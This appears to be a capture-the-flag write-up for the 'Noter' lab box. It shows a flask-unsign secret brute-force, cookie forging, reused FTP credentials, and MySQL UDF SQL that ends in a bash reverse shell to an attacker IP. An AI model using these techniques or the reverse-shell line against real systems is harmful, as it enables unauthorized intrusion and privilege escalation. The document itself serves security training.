Summary

Noter was a Medium difficulty Linux box created by kavigihan. Initial Foothold was finding a weak signing key used to sign the session we can modify the session and get ourself VIP access using that we get the ftp credentials and we find a pdf containing hint for ftp admin credential. Logging as ftp_admin we get access to app backup.In backup we find /export_note_local route which take an markdown and export that as pdf. Using the we can get command injection and get access to the box as svc we can get privilege escalation using module injection in mysql.

Enumeration

nmap

# Nmap 7.92 scan initiated Sun May  8 04:06:01 2022 as: nmap -sC -sV -oN nmap/noter noter.htb
Nmap scan report for noter.htb (10.129.58.78)
Host is up (0.30s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c6:53:c6:2a:e9:28:90:50:4d:0c:8d:64:88:e0:08:4d (RSA)
|   256 5f:12:58:5f:49:7d:f3:6c:bd:9b:25:49:ba:09:cc:43 (ECDSA)
|_  256 f1:6b:00:16:f7:88:ab:00:ce:96:af:a6:7e:b5:a8:39 (ED25519)
5000/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-title: Noter
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May  8 04:10:20 2022 -- 1 IP address (1 host up) scanned in 259.89 seconds

Port 5000

Opening the page we see

Which look like an note taking application running on Werkzeug

Let’s Register to the website and see what happens

After Successful Register, Lets Login

On Dashboard We see two button

Add Note and Upgrade to VIP

Creating some notes we see

the endpoint /note/4/ Lets look for other?

Not finding anything I looked into trying to unsign the cookie to maybe find the secret

flask-unsign -u -c "eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiZjN2M3IifQ.Ynd81g.NGys3evMvZ-sFmG0a1JEg6KulBY" -w "/usr/share/wordlists/rockyou.txt" --no-literal-eval

and was able to find the secret as secret123

Enumerating for user on login screen based on error message we find an username as blue.

forging the cookie for that and trying it out we find

a note as

Logging into the ftp service we find the policy.pdf which show the password creation patern.

Logging as ftp_admin with password ftp_admin@Noter!

we find an app backup so downloading that

Shell

Nildogg36

use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.68/1337 0>&1"');

Root Shell

https://medium.com/r3d-buck3t/privilege-escalation-with-mysql-user-defined-functions-996ef7d5ceaf